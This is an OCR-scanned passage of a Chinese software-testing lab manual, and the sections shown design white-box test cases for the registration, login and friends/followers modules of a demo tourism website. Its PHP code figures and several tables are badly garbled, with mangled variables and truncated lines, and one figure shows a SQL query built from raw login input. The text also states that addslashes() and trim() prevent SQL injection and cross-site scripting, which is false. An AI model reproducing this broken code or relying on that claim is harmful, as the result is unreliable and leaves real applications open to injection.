CD 安装 卸载 测试 。iOS 系统 和 Android 系统 使 用 的 APP 安装 包 下 载 和 安装 过 程 都 是 
不 一 样 的 ,我 们 需要 注意 项 目的 相关 要 求 以 及 下 载 中 的 安装 方式 安装 过 程 ,需要 测试 该 
APP 安装 过 程 中 遇 到 各 种 情况 的 处 理 方式 ,例如 安装 时 内 存 不 足 、 死 机 等 。 

(2) 测试 APP 过 程 中 ,除了 对 每 个 功能 点 进行 测试 外 ,还 需要 注意 区 分 有 网 络 和 无 网 
络 两 种 情况 下 APP 的 处 理 方式 。 

(3) APP 的 测试 有 个 常见 的 问题 就 是 应 用 程序 崩溃 (Crashes), 对 于 这 样 的 Bug, 我 们 
一 般 需 要 上 传 相应 的 日 志文 件 (log) 。 

(4) 兼容 性 测试 ,兼容 性 测试 需要 测试 不 同 版 本 的 操作 系统 和 不 同 手机 型 号 等 。 


W 拓展 训练 


选择 电子 商务 网 站 http://www. kiehls. com 中 的 一 个 模块 ,进行 更 深入 的 测试 用 例 


设计 。 


提醒 : 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 测试 用 例 设计 。 
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NA 


读书 笔记 
ae 


Date: 





读书 笔记 Name: 





励志 名 句 : If you don't aim high you will never hit high. 





不 立 大 志 , 难 攀高 峰 。 


















































4j «8; ^d; e@; ed; uq; od; eq; ^4; vq; ^4; e; ^4; un; 





实验 目的 


H fx iX (white-box testing) X f 3& HJH £x ill iX (glass box 
testing) ,结构 测试 (structural testing) 等 ,是 软件 测试 的 主要 方法 之 
一 ,也 称 结构 测试 .逻辑 驱动 测试 或 基于 程序 本 身 的 测试 。 

本 实验 白 盒 测试 用 例 设 计 实 验 选 用 智慧 绍兴 的 注册 与 登录 功能 
代码 块 进 行 设计 。 注 册 与 登录 是 最 常见 的 应 用 。 通 过 对 代码 分 析 与 
测试 用 例 的 设计 ,带领 读者 感受 如 何 阅读 源 程序 ,以 及 如 何 从 源 程 序 
的 角度 出 发 设计 测试 用 例 。 


12.1. Hali 


白 盒 测试 是 测试 应 用 程序 的 内 部 结构 或 运作 ,而 不 是 测试 应 用 
程序 的 功能 ( 即 黑 盒 测 试 ) 。 在 白 盒 测试 时 ,从 编程 语言 的 角度 来 设 
计 测 试 案例 。 测 试 者 输入 数据 验证 数据 流 在 程序 中 的 流动 路 径 ,并 
确定 适当 的 输出 ,类 似 测 试 电路 中 的 节点 。 测 试 者 了 解 待 测试 程序 
的 内 部 结构 、 算 法 等 信息 ,这 是 从 程序 设计 者 的 角度 对 程序 进行 的 
测试 。 

白 合 测试 可 以 应 用 于 单元 测试 (unit testing)、 集 成 测试 

(integration testing) 和 系统 的 软件 测试 流程 ,可 测试 在 集成 过 程 中 每 
一 单元 之 间 的 路 径 ,或 者 主 系统 和 子 系统 。 尽 管 这 种 测试 方法 可 以 发 
现 许多 错误 或 问题 ,但 它 可 能 无 法 检测 未 使 用 部 分 的 规范 。 
白 盒 测试 要 求 测试 者 对 被 测试 的 源 代 码 有 一 个 深层 次 的 理解 。 
程序 员 必 须 对 应 用 有 一 个 深度 理解 ,清楚 地 知道 应 创建 哪 种 测试 用 
例 , 从 而 使 得 测试 中 的 所 有 可 见 路 径 都 被 执行 。 源 代码 被 理解 之 后 才 
可 以 被 分 析 , 以 创造 测试 用 例 。 以 下 是 白 盒 测试 创建 测试 用 例 的 3 个 
基本 步骤 。 

CD 输入 包括 不 同 种 类 的 需求 。 例 如 ,功能 方面 .文档 中 的 详细 
设计 、 合 适 的 源码 、 安 全 方面 的 考虑 。 这 是 白 盒 测试 列 出 所 有 基本 信 
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息 的 准备 阶段 。 

(2) 过 程 包括 风险 分 析 来 导向 整个 测试 过 程 。 测 试 工程 师 制订 合适 的 测试 计划 ,严格 
执行 测试 用 例 , 以 及 与 开发 工程 师 交流 过 程 中 想到 的 目前 遗漏 的 测试 用 例 。 这 是 创建 测试 
用 例 的 阶段 ,以 确保 彻底 地 测试 了 应 用 程序 ,并 且 记 录 下 相应 的 测试 结果 。 

G) 输出 包括 准备 最 后 报告 ,其 中 包含 了 以 上 所 有 准备 材料 和 结果 。 

我 们 会 在 接 下 来 的 3 个 实验 中 分 别 用 实际 案例 来 讲解 设计 白 盒 测试 用 例 的 具体 操作 
方法 。 


12.2. 注册 /登录 模块 功能 介绍 


下 面 介绍 用 户 注册 /登录 模块 的 案例 。 打 开 智 慧 绍兴 数字 化 导游 平台 ,网 址 为 http:// 
www. rogisoft. com/zhsx/ , 主 界面 如 图 12-1 所 示 。 








智慧 首页 ESM 景点 互动 到 此 一 游 景区 特产 我 的 空间 美景 欣赏 登录 


最 美的 时 光 就 是 一 直 在 路 上 ， 发 现 美丽 的 风景 ， 让 我 们 说 走 就 走 


Life can be likened to a journey with an unknown destination. 














12-31 智慧 绍兴 主 界面 
单 击 右 上 角 的 “登录 "链接, 即 可 看 到 登录 页 面 ,如 图 12-2 所 示 。 





智慧 绍兴 -个 性 空间 











图 12-2 登录 页 面 
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如 果 没 有 账户 ,就 要 先 注册 新 用 户 。 单 击 登录 页 面 中 的 “注册 新 用 户 ” 链 接 , 跳 转 到 用 户 
注册 页 面 ,如 图 12-3 所 示 。 








村 绍兴 -个 性 空间 -用 
户 注 册 
[| 











图 12-3 用 户 注册 页 面 


12.3 注册 代码 分 析 


注册 和 登录 页 面 都 是 现在 网 站 中 常见 的 ,下 面 首先 讲解 注册 功能 。 从 用 户 注 册页 面 中 
可 以 看 出 注册 新 用 户 需 要 用 户 名 、 密 码 ,重复 密码 这 3 个 信息 。 对 注册 有 了 基本 了 解 后 ， 
可 以 分 析 注 册 的 代码 ,代码 如 图 12-4 所 示 。 





11 Rights Reserved 


/admin/views/'); 
SUser_Model = new 
Saction - ; BE shes($ GET['action']) : '' 


(5. PosT['login']) ? ad t G POST['login'])) : 
Spassword ($_POST['password']) ? s POST[* AERE p 
Spassword2 POST['password2']) ? ashes (S. PoST[ 'password2'])) 


«(S POST['ischeck'])) : 


(Slogin) == @) ( 
ct('./register.php?error_login=1'); 


en($password) < 6) ( 
t('./register.php?error_pwd_len=1'); 


(Spassword !- Spassword2) ( 
ect('./register.php?error pwd2-1'); 


5 


SPHPASS Pa: ash( Js 
Spassword HPASS->HashPas (Spassword); 


SUser Model-»addUser(Slogin, $password, Srole, Sischeck); 
e(array('sta' ,'user')); 
index.php?rnde' .rond(). 





图 12-4 注册 代码 
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代码 第 16 行 中 if C$ action == "new') 就 是 用 户 填写 好 信息 并 单 击 “ 注 册 ” 按 钮 之 后 服 
务 端 的 处 理 逻 辑 。login 是 登录 用 户 名 ,两 个 password 是 输入 的 两 次 密码 ; 里 面 有 几 个 检 
dk. 用 户 是 否 已 经 存在 ,输入 是 否 为 空 ,密码 是 否 小 于 6 个 字符 ,两 次 输入 密码 是 否 一 样 。 
这 些 都 是 设计 白 盒 测试 用 例 的 测试 点 。addSlashes() 和 trim() 具 备 防 SQL 注入 和 防 跨 站 
的 功能 。 

如 果 输 入 的 信息 都 满足 条 件 , 则 将 密码 存 为 哈 希 字符 ,创建 用 户 , 更 新 缓存 ,注册 成 功 。 


12.4 设计 注册 测试 用 例 


以 上 是 对 代码 的 深入 了 解 , 可 以 根据 代码 中 分 析 的 测试 点 来 设计 白 盒 测试 用 例 。 设 计 
的 注册 测试 用 例如 表 12-1 所 示 。 
表 12-1 注册 测试 用 例 


Pa 实际 测试 
结 
测 试 点 操作 步骤 期 望 结果 (Pass/Fail) 





CD 打开 用 户 注册 页 面 
1 (2) 输入 一 个 新 的 用 户 名 和 密码 
_ | (3) 单 击 “ 注 册 ” 
用 户 名 是 否 存在 “|(1) 打开 用 户 注册 页 面 
2 ad Él em BRRIP E fF e e fiet BUR 
(3) 单 击 “ 注 册 ” 
CD 打开 用 户 注册 页 面 
(2) 在 “用 户 名 "文本 框 中 输入 空 | 提 示 用 户 名 不 能 为 空 ,不 能 注册 
格 ,输入 密码 123456 成 功 
(3) 单 击 “ 注 册 ” 
COD 打开 用 户 注 册页 面 
(2) 在 “用 户 名 ”文本 框 中 输入 | ，_- 
4 test321, 输 入 密码 为 空格 提示 密码 不 能 为 空 ,不 能 注册 成 功 
(3) 单 击 “注册 ” 
COD 打开 用 户 注册 页 面 
(2) 在 “用 户 名 ”文本 框 中 输入 | 提示 密码 不 能 少 于 6 个 字符 ,不 能 
test5, 输 入 密码 12345 注册 成 功 
(3) 单 击 “ 注 册 ” 
(1) 打开 用 户 注册 页 面 
(2) 在 “用 户 名 ”文本 框 中 输入 
sd test6, 输 入 密码 123456 TEMER 
(3) 单 击 “注册 ” 
COD 打开 用 户 注册 页 面 
(2) 在 “用 户 名 ”文本 框 中 输入 
T test7, 输 入 密码 1234567 magos 
(3) 单 击 “ 注 册 ” 


新 的 账户 注册 成 功 ,密码 在 数据 库 
中 保存 为 哈 希 字符 








一 输入 是 否 为 空 











o 
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续 表 
序 实际 测试 
g 测 试 点 操作 步骤 muss (Pass/Fail) 





COD 打开 用 户 注 册页 面 

(D 在 “用 户 名 ”文本 框 中 输入 

8 test8, 输 入 密码 123456 和 重 
复 密码 1234567 

(3) 单 击 “ 注 册 ” 

COD 打开 用 户 注册 页 面 

(2) 在 “用 户 名 ”文本 框 中 输入 

9 test8, 输 入 密码 Yan123 和 重 
复 密码 yan123 

(3) 单 击 “ 注 册 ” 

CD 打开 用 户 注册 页 面 


(2) 检查 该 页 面 的 链接 是 否 都 正 
10| 其 他 测试 常 ,这 里 只 有 “返回 首页 " 链 跳 转 到 网 站 首页 


接 , 单 击 “ 返 回首 页 ” 


x wasis I 


本 例 中 的 注册 用 户 能 够 深入 的 点 很 少 ,不 过 在 实际 的 注册 过 程 中 一 般 都 有 许多 项 可 供 
深入 测试 。 另 外 ,即使 只 有 本 例 中 的 用 户 名 、 密 码 与 重复 密码 ,也 有 许多 可 以 测试 的 。 例 如 ， 
用 户 名 与 密码 特殊 字符 的 验证 ,用 户 名 KSS 攻击 验证 ,用 户 名 SQL 注入 验证 ,已 经 注册 的 
用 户 名 能 不 能 重复 注册 ,都 可 以 引申 为 测试 用 例 。 


12.5 登录 代码 分 析 


测试 完成 注册 功能 之 后 ,现在 来 看 登录 功能 。 登 录 代 码 如 图 12-5 所 示 。 

用 户 输 入 用 户 名 、 密 码 并 单 击 “登录 "后 ,后 台 逻 辑 要 对 用 户 输入 的 这 些 信息 进行 判断 ， 
需要 验证 验证 码 是 否 正确 (需要 输入 验证 码 的 时 候 )、 用 户 名 是 否 正确 、 密 码 是 否 正确 ,只 有 
都 正确 的 情况 下 才 可 以 登录 成 功 。 如 果 登 录 的 账户 不 是 普通 用 户 ,而 是 管理 员 用 户 , 则 利用 
图 12-6 所 示 代 码 通 过 登录 名 查询 管理 员 信 息 。 

当然 ,登录 还 有 很 多 其 他 函数 方法 ,如 将 明文 密码 和 数据 库 加 密 后 的 密码 进行 验证 、 验 
证 Cookie、 生 成 Token 防御 CSRF (Cross Site Request Forgery, 跨 站 点 请 求 伪造 ) 攻 击 等 ， 
在 此 就 不 一 一 列 出 代码 。 下 面 介绍 这 些 函 数 的 相关 知识 。 

1. Cookie 

Cookie 验证 用 于 长 时 间 用 户 验证 。Cookie 验证 是 有 状态 的 ,意味 着 验证 记录 或 者 会 话 
需要 一 直 在 服务 端 和 客户 端 保持 。 服 务 器 需要 保持 对 数据 库 活动 会 话 的 追踪 , 当 在 前 端 
创建 一 个 Cookie 时 . Cookie 中 包含 一 个 session 标识 符 。 传 统 Cookie 会 话 的 验证 流程 
如 下 。 

CO 用 户 登 录 ,输入 账号 和 密码 。 


提示 两 次 密码 不 一 致 ,不 能 注册 
成 功 





一 两 次 密码 是 否 一 致 


提示 两 次 密码 不 一 致 ,不 能 注册 
成 功 
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nPage(SerrorCode = NULL) ( 
y, s= "y" P 
</span> 
name=\"imgcode\" id=\"imgcode\" type=\"text\" /> 
"absmiddle\"></div>" : 


rorCode) ( 
h (SerrorCode) { 


es('login'); 


图 12-5 登录 代码 


X."user WHERE username = 'Suseriogin'")) ( 


(SuserData[ 'nicknase']); 
(Suserbata[ 'usernase']); 





图 12-6 ”查询 管理 员 信 息 代码 


(2) 服务 器 验证 用 户 账号 密码 正确 ,创建 一 个 session 存储 在 数据 库 (或 者 redis) 中 。 


(3) 将 


session ID 放 进 Cookie 中 ,被 存储 在 用 户 浏 览 器 中 。 


(4) 再 次 发 起 请 求 ,服务 器 直接 通过 session ID 对 用 户 进行 验证 。 
(5) 一 旦 用 户 退 出 , 则 session 在 客户 端 和 服务 器 端 都 被 销毁 。 


2. Tol 


ken 


Token 验证 是 无 状态 的 ,服务 器 不 记录 哪些 用 户 登 录 了 或 者 哪些 JWT 被 发 布 了 ,而 是 
每 个 请 求 都 带 上 了 服务 器 需要 验证 的 Token, Token 放 在 Authorization header 中 ,形式 是 






























Bearer { JWT ) ,但 是 也 可 以 在 post body 里 发 送 , 甚 至 作为 query parameter, 
验证 流程 如 下 。 
(1) 用 户 输入 登录 信息 。 
(2) PRONUS RE — Token. 
(3) Token 存储 在 客户 端 ,大 Pani 常 在 local storage, 但 是 也 可 以 存储 在 session 





storage 或 


者 Cookie 中 。 
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(4) 发 起 请 求 时 将 Token 放 在 Authorization header 中 ,或 者 与 上 面 的 方式 相同 。 


(5) 服务 器 端 解码 JWT ,然后 验证 Token, 如 果 Token 有 效 , 则 处 理 该 请 求 。 


(6) 一 旦 用 户 退 出 ,Token 在 客户 端 被 销毁 ,不 需要 经 过 服务 器 端 。 


3. CSRF 


CSRF 攻击 者 在 用 户 已 经 登录 目标 网 站 之 后 , 诱 使 用 户 访问 一 个 攻击 页 面 ,利用 目标 网 
站 对 用 户 的 信任 ,以 用 户 身份 在 攻击 页 面 对 目 标 网 站 发 起 伪造 用 户 操作 的 请 求 ,达到 攻击 目 
的 。 与 跨 网 站 脚本 (XSS) 相 比 ,XSS 利用 的 是 用 户 对 指定 网 站 的 信任 ,CSRF 利用 的 是 网 站 
对 用 户 网 页 浏览 器 的 信任 。 

这 种 恶意 的 网 址 有 很 多 种 形式 ,藏身 于 网 页 中 的 许多 地 方 。 此 外 ,攻击 者 也 不 需要 
控制 放置 恶意 网 址 的 网 站 。 例 如 ,他 可 以 将 这 种 地 址 藏 在 论坛 .博客 等 任何 用 户 生 成 内 
容 的 网 站 中 。 这 意味 着 如 果 服 务 器 端 没 有 合适 的 防御 措施 ,用 户 即 使 访问 熟悉 的 可 信 网 
站 也 有 受 攻击 的 危险 。 攻 击 者 并 不 能 通过 CSRF 攻击 来 直接 获取 用 户 的 账户 控制 权 , 也 
不 能 直接 窍 取 用 户 的 任何 信息 ,他 们 能 做 到 的 是 欺骗 用 户 浏览 器 ,让 其 以 用 户 的 名 义 执 


行 操 作 。 


12.6 


设计 登录 测试 用 例 


对 代码 分 析 后 ,就 可 以 开始 设计 登录 的 白 盒 测试 用 例 , 如 表 12-2 所 示 。 
表 12-2 登录 测试 用 例 


操作 步骤 


期 望 结 果 


实际 测试 
(Pass/Fail) 





3 表单 测试 





(1) 打开 登录 页 面 

(2) 输入 正确 的 用 户 名 sms ME 
码 test123 

(3) 单 击 “ 登 录 ” 


登录 成 功 





(1) 打开 登录 页 面 

(2) 输入 错误 的 用 户 名 smS 和 密 
码 test123 

(3) 单 击 “ 登 录 ” 


登录 失败 ,提示 “用 户 名 错误 ,请 重 
新 输入 ” 





(1) 打开 登录 页 面 

(2) 输入 用 户 名 sms 和 错误 的 密 
码 Test123 

(3) 单 击 “ 登 录 ” 


登录 失败 ,提示 “密码 错误 ,请 重新 
输入 ” 





(1) 打开 登录 页 面 

(2) 输入 用 户 名 为 空格 ,密码 为 
test123 

(3) 单 击 “ 登 录 ” 


登录 失败 ,提示 “请 输入 用 户 名 ” 








(1) 打开 登录 页 面 
(2) 输入 用 户 名 sms, 密 码 为 空格 
(3) 单 击 “ 登 录 ” 





登录 失败 ,提示 “请 输入 密码 ” 
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NA 


ZR 
序 实际 测试 
号 测 试 点 操作 步骤 期 望 结果 (Pass/Fail) 
CD 打开 登录 页 面 
(2) 用 户 名 或 者 密码 都 输入 很 长 
6 的 字符 串 登录 失败 ,服务 器 能 正常 响应 
(3) 单 击 “登录 ” 
COD 打开 登录 页 面 
(2) 用 户 名 和 密码 框 输入 SQL 注 登录 失败 ,不 能 注入 成 功 
入 代码 
(3) 单 击 “登录 ” 
(1) 打开 登录 页 面 
(2) 输入 正确 的 用 户 名 sms ME 
码 test123 
8 (3) HAER” 
(4) 单 击 “登录 ” 
(5) 关闭 浏览 器 
(6) 再 次 打开 浏览 器 
COD 打开 登录 页 面 = 
° (2) 观察 页 面 样式 ipn 
(1) 打开 登录 页 面 


10 (2) 单 击 页 面 中 所 有 链接 : 返回 | 都 能 跳 转 到 正确 的 页 面 


首页 ,注册 新 用 户 
OEIL] 


登录 的 测试 用 例 可 以 继续 扩展 ,本 例 也 有 部 分 代码 没有 继续 深入 的 展示 以 及 设计 测试 
用 例 ,读者 可 以 按照 思路 ,自己 扩充 测试 用 例 ,使 其 更 加 完善 。 


W 拓展 训练 


下 载 本 书 配套 的 注册 登录 源码 ,进行 更 深入 的 注册 登录 模块 白 盒 测试 用 例 设 计 。 
提醒 : 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 测试 用 例 设计 。 








一 安全 性 测试 








依然 是 登录 状态 ,“ 记 住 我 "的 功能 
dox 


其 他 测试 
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读书 笔记 
44 e$; 44; e@; ^4; e@; «4: e@; ^4; e: ^4; e$: ^4; e: 


读书 笔记 Name: Date: 








励志 名 句 : Studies this matter , lacks the time , but is lacks diligently. 





学 习 这 件 事 , 不 是 缺乏 时 间 ,而 是 缺乏 努力 。 
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设计 好 友 /粉丝 白 盒 测 试用 例 


—&5Hfü ) 


好 友 / 粉 丝 白 盒 测试 用 例 讲 解 6 种 覆盖 方法 (语句 覆盖 、 判 定 覆 
盖 ` 条 件 覆 盖 、 判 定 /条 件 覆 盖 、 组 合 覆 盖 路径 覆 盖 ) 以 及 各 自 的 优 缺 
点 , 供 读者 用 心 去 设计 与 体会 。 

本 实验 白 盒 测试 用 例 设计 实验 选用 智慧 绍兴 的 好 友 / 粉 丝 功能 代 
码 块 进行 设计 。 好 友 / 粉 丝 是 交友 互动 类 网 站 常见 的 功能 。 通 过 对 代 
码 分 析 与 测试 用 例 的 设计 ,带领 读者 感受 如 何 阅读 源 程序 ,以 及 如 何 
从 源 程序 的 角度 出 发 设计 测试 用 例 。 


13.1 覆盖 方法 


第 12 章 的 实验 通过 用 户 注册 /登录 的 实际 案例 设计 了 白 盒 测试 
用 例 , 在 设计 时 , 白 盒 测试 的 方法 总 体 上 分 为 静态 方法 和 动态 方法 两 
大 类 。 

CD 静态 方法 : 一 种 不 通过 执行 程序 而 进行 测试 的 技术 。 静 态 
分 析 的 关键 功能 是 检查 软件 的 表示 和 描述 是 否 一 致 ,没有 冲突 或 者 没 
有 歧义 。 

(2) 动态 分 析 : 主要 特点 是 当 软 件 系统 在 模拟 的 或 真实 的 环境 
中 执行 之 前 ,之 中 和 之 后 ,对 软件 系统 行为 的 分 析 。 动 态 分 析 包 含 了 
程序 在 受 控 的 环境 下 使 用 特定 的 期 望 结果 正式 运行 。 它 显示 了 一 个 
系统 在 检查 状态 下 是 否 正 确 。 在 动态 分 析 技 术 中 ,最 重要 的 技术 是 路 
径 和 分 支 测 试 。 常 见 有 以 下 6 种 覆盖 测试 方法 。 

1. 语句 覆盖 

语句 覆盖 是 最 起 码 的 结构 覆盖 要 求 。 语 句 覆 盖 要 求 设计 足够 多 
的 测试 用 例 ,使 得 程序 中 的 每 条 语句 至 少 被 执行 一 次 。 

优点 : 可 以 很 直观 地 从 源 代码 得 到 测试 用 例 ,无 须 细 分 每 个 判定 
表达 式 。 

缺点 : 这 种 测试 方法 仅仅 针对 程序 逻辑 中 显 式 存在 的 语句 ,对 于 
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隐藏 的 条 件 和 可 能 到 达 的 隐 式 逻辑 分 支 是 无 法 测试 的 。 例 如 ,在 Do-While 结构 中 ,语句 覆 
盖 执 行 其 中 某 一 个 条 件 分 支 。 显 然 ,语句 覆盖 对 于 多 分 支 的 迎 辑 运算 是 无 法 全 面 反 映 的 , 它 
只 在 乎 运行 一 次 ,而 不 考虑 其 他 情况 。 

2. 判定 覆盖 

判定 覆盖 又 称 分 支 覆 盖 , 它 要 求 设计 足够 多 的 测试 用 例 ,使 得 程序 中 每 个 判定 至 少 有 一 
次 为 真 值 , 有 一 次 为 假 值 , 即 程序 中 的 每 个 分 支 至 少 执行 一 次 ,每 个 判断 的 取 真 、. 取 假 至 少 执 
行 一 次 。 

优点 : 判定 覆盖 比 语句 覆盖 几乎 要 多 一 倍 的 测试 路 径 , 当 然 也 就 具有 比 语句 覆盖 更 强 
的 测试 能 力 。 同 样 ,判定 覆盖 也 具有 和 语句 覆盖 一 样 的 简单 性 ,无 须 细 分 每 个 判定 就 可 以 得 
到 测试 用 例 。 

缺点 : 大 部 分 的 判定 语句 由 多 个 多 辑 条 件 组 合 而 成 (如 判定 语句 中 包含 AND、OR、 
CASE) , 若 仅仅 判断 其 最 终结 果 ,而 忽略 每 个 条 件 的 取 值 情况 ,必然 会 遗漏 部 分 测试 路 径 。 

3. AE 

条 件 覆 盖 要 求 设计 足够 多 的 测试 用 例 ,使 得 判定 中 的 每 个 条 件 获 得 各 种 可 能 的 结果 , 即 
每 个 条 件 至 少 有 一 次 为 真 值 ,有 一 次 为 假 值 。 

优点 : 条 件 覆 盖 比 判定 覆盖 增加 了 对 符合 判定 情况 的 测试 ,增加 了 测试 路 径 。 

缺点 : 要 达到 条 件 覆 盖 ,需要 足够 多 的 测试 用 例 , 但 条 件 覆 盖 并 不 能 保证 判定 覆盖 。 条 
件 覆 盖 只 能 保证 每 个 条 件 至 少 有 一 次 为 真 ,而 不 考虑 所 有 的 判定 结果 。 

4. 判定 /条 件 覆 盖 

判定 /条 件 覆盖 设计 足够 多 的 测试 用 例 , 使 得 判定 中 每 个 条 件 的 所 有 可 能 结果 至 少 出 现 
一 次 ,每 个 判定 本 身 所 有 可 能 结果 也 至 少 出 现 一 次 。 

优点 : 判定 /条 件 覆 盖 满 足 判 定 覆 盖 准 则 和 条 件 覆盖 准则 ,弥补 了 二 者 的 不 足 。 

缺点 : 未 考虑 条 件 的 组 合 情 况 。 


5. 组 合 覆盖 
组 合 材 盖 要 求 设 计 足 够 多 的 测试 用 例 ,使 得 每 个 判定 中 条 件 结果 的 所 有 可 能 组 合 至 少 
出 现 一 次 。 


优点 : 多 重 条 件 覆 盖 准 则 满足 判定 覆盖 条件 覆盖 和 判定 /条 件 覆 盖 准 则 。 更 改 的 判 
定 /条 件 覆 盖 要 求 设 计 足 够 多 的 测试 用 例 , 使 得 判定 中 每 个 条 件 的 所 有 可 能 结果 至 少 出 
现 一 次 ,每 个 判定 本 身 的 所 有 可 能 结果 也 至 少 出 现 一 次 ,并 且 每 个 条 件 都 能 单独 影响 判 
定 结果 。 

缺点 : 线性 地 增加 了 测试 用 例 的 数量 。 

6. Rie TEE 

路 径 覆 盖 要 求 设计 足够 多 的 测试 用 例 ,覆盖 程序 中 所 有 可 能 的 路 径 。 

优点 : 这 种 测试 方法 可 以 对 程序 进行 彻底 的 测试 , 比 前 面 5 种 测试 方法 的 覆盖 面 都 广 。 

缺点 : 由 于 路 径 覆 盖 需 要 对 所 有 可 能 的 路 径 进行 测试 (包括 循环 ` 条 件 组 合 、 分 支 选 择 
等 ) ,所 以 需要 设计 大 量 、 复 杂 的 测试 用 例 ,使 得 工作 量 呈 指数 级 增长 。 而 在 有 些 情 况 下 ,一 
些 执行 路 径 是 不 可 能 被 执行 的 ,路 径 覆 盖 不 仅 降低 了 测试 效率 ,而且 大 量 的 测试 结果 的 累积 
也 为 排 错 带 来 麻烦 。 
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13.2. 好友/ 粉丝 功能 介绍 


学 习 了 和 白 盒 测 试 方法 ,在 设计 测试 用 例 时 ,就 可 以 根据 实际 情况 来 选择 测试 方法 ,使 设 
计 出 来 的 测试 用 例 覆 盖 得 更 加 全 面 。 本 节 继 续 通过 实际 案例 来 加 深 对 白 盒 测试 用 例 设计 的 


学 习 。 下 面 来 设计 用 户 好 友 / 粉 丝 白 盒 测 试用 例 。 
同样 地 ,首先 来 看 用 户 好 友 、 用 户 粉丝 是 怎么 样 的 一 个 功能 。 打 开 智 慧 
网 站 , 单 击 “ 我 的 空间 ”菜单 下 的 “我 的 好 友 ”, 页 面 如 图 13-1 所 示 。 





^ kE RGGBASEREORRGNIE Sao +s) 





—-——À a onenera ID Z939 SRE NETZE. 











图 13-1 “我 的 好 友 " 页 面 


“我 的 好 友 ”页面 主 要 展示 我 的 好 友 列 表 、 等 待 我 批准 的 好 友 列 表 、 我 的 好 友 请 求 .等待 
他 人 批准 列表 和 好 友 推 荐 等 。 在 “我 的 空间 ”菜单 下 单 击 “ 我 的 关注 ”, 即 可 看 到 “我 的 关注 ” 


页 面 ,也 就 是 粉丝 页 面 ,如 图 13-2 所 示 。 





—— 
j2 
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图 13-2 “我 的 关注 ”页 面 


“我 的 关注 "(粉丝 ) 中 主要 展示 了 我 关注 谁谁 关注 我 和 关注 推荐 。 











231 
NM 


232 


AN 


软件 测试 实验 实 训 指南 


13.3 好友/ 粉丝 代码 分 析 


看 了 这 两 个 模块 的 页 面 ,对 其 基本 功能 有 所 了 解 .下面 来 看 这 两 个 模块 的 代码 。“ 我 的 
好 友 ” 代 码 如 图 13-3 所 示 。 


t (c) # 


'globals. 


(Sacti 


All Rights Reserved 


php' 


Sfriends = $Friend_Model->g 
Spendingfriends = SFriend Model 
quest = $Friend Mode: 
nd iend Model-». 
(“homehead 
(homebar 


iew( 


erface URL: JOO/ 
$action == 'add')( 


("friend'); 
"homefooter'); 


blog/admin/myfriend.php?a -add&uideXXXx&fidexxx 加 别人 为 


Sfid = isset($_GET['fid']) ? intval($_GET['fid']) : 1; 


if(!SFriend Model 
SFriend Model 


$returnURL - './m 


(Suid, Sfid)){ 
end($uid, Sfid); 


riend.php?rnd='.rond().''; 


t (SreturnURL); 


terface URL: OX/ 


== "app')[ 


blog/admin/myfriend.php?a =app&uid=XXX8fid=XXX iil 


et($ GET['fid']) ? (S. GET['fid'] 
n jest ($u: 


riend.php?rnde' 


(SreturnURL 


RL: OO/ 
Un 


SFriend Mode. 
SreturnURL = 


“我 的 好 友 ”f 
getMyAddFriendsReq 
获得 我 的 好 友 请 3 
当 action —— 'add Hf, 





当 action — — 'del'Ilf . WBR fth A Jit #f i 





* 
此 来 设计 。 





“我 的 关注 ”代码 中 





等 待 他 人 批准 的 列表 ,getNotMyFriends 为 获取 好 友 推 荐 的 列表 ; 


“我 的 关注 ”代码 如 图 13-4 所 示 。 


blog/admin/myfriend.php?actionedel&uideXXX&fideXXX 删除 


t($ GET['fid']) ? intvaL($ GET['fid']) : 1; 
fid); 


图 13-3 “我 的 好 友 ” 代 码 


V ü H, getMyApprovedFriends 为 获得 “我 的 好 友 ” 列 表 ， 
uest 为 获得 等 待 我 批准 的 好 友 列 表 ,getMyPendingRequestFriends 为 
这 里 






加 别人 为 自己 的 好 友 , 当 action 二 =='app' 时 ,批准 他 人 加 好 友 的 
/删除 好 友 。 由 此 可 以 得 出 ,测试 这 个 功能 模块 主 





测试 这 几 个 列表 ,以 及 对 这 几 个 列表 进行 的 增 、 删 查 等 操作 ,设计 测试 用 例 也 可 以 由 





P .getWhoFensiMe 可 以 获取 到 谁 关 注 了 我 的 列表 ,getIFensiWho 可 





以 获取 到 我 关注 了 谁 的 列表 ,而 getINotFensiWho 函数 可 以 获取 到 推荐 关注 列表 。 同 样 当 


实验 13 ”设计 好 友 / 粉 丝 白 盒 测试 用 例 


1 Rights Reserved 


(‘fensi’); 
(“homefooter'); 


L: JO00/blog/adnin/myfensi.php?action=addauid=)ONX&sid=)00 
add')( 
t(S, GET['sid']) ? intvo((S GET['sid']) : 1; 
nsi Model->isFe ist(Suid, $sid))( 
SFensi Model-»sddfensi(Suid, $sid); 
) 
$returnURL = './myfensi.php?rnd= O 
(SreturnURL); 


log/admin/myfensi, php?action=delauid=)00(sid=)0C 


ET['sid']) ? (S GET['sid']) : 1; 
T (Suid, $sid); 
SreturnURL = './myfensi.php?rnd= 931 
(SreturnURL) ; 





图 13-4 “我 的 关注 "代码 


action 王 一 'add' 时 是 加 别人 为 关注 ,action 王 = 'del' 时 是 取消 关注 ,这 里 和 “我 的 好 友 ” 有 所 区 
别 , “我 的 好 友 ” 中 添加 别人 为 好 友 时 是 需要 对 方 同意 后 , 方 可 展示 在 “我 的 好 友 ” 列 表 中 ,而 
关注 不 需要 别人 同意 ,只 要 操纵 了 add 即 可 在 “我 的 ”( 粉 丝 ) 列 表 中 展示 。 所 以 ,在 设计 
我 的 粉丝 模块 的 测试 用 例 时 ,这 个 比较 复杂 的 测试 用 例 是 没有 的 。 


13.4 设计 好 友 / 和 粉丝 测试 用 例 


现在 ,根据 前 述 测试 点 设计 白 盒 测试 用 例 ,如 表 13-1 Bron o 
表 13-1 ”好友 /粉丝 测试 用 例 














lij 
: M 试 点 Bem nues bac 
OD 登录 网 站 
i 《2 PE RESMEN F RH serna iot gg p 
(3) 观察 页 面 





“我 的 好 友 "列表 (0) 登录 网 站 
(2) 单 击 “ 我 的 空间 "菜单 TF“ 我 的 
2 好 友 ” 
(3) 移动 鼠标 指针 到 “我 的 好 友 ” 
列表 下 的 好 友 头 像 和 昵称 上 


鼠标 指针 变 成 小 手 形状 ,并 且 出 现 
Tooltip 为 “删除 好 友 ” 

















软件 测试 实验 实 训 指南 


续 表 





试 


操作 步骤 


期 望 结果 


实际 测试 
CPass/Fail) 





a 


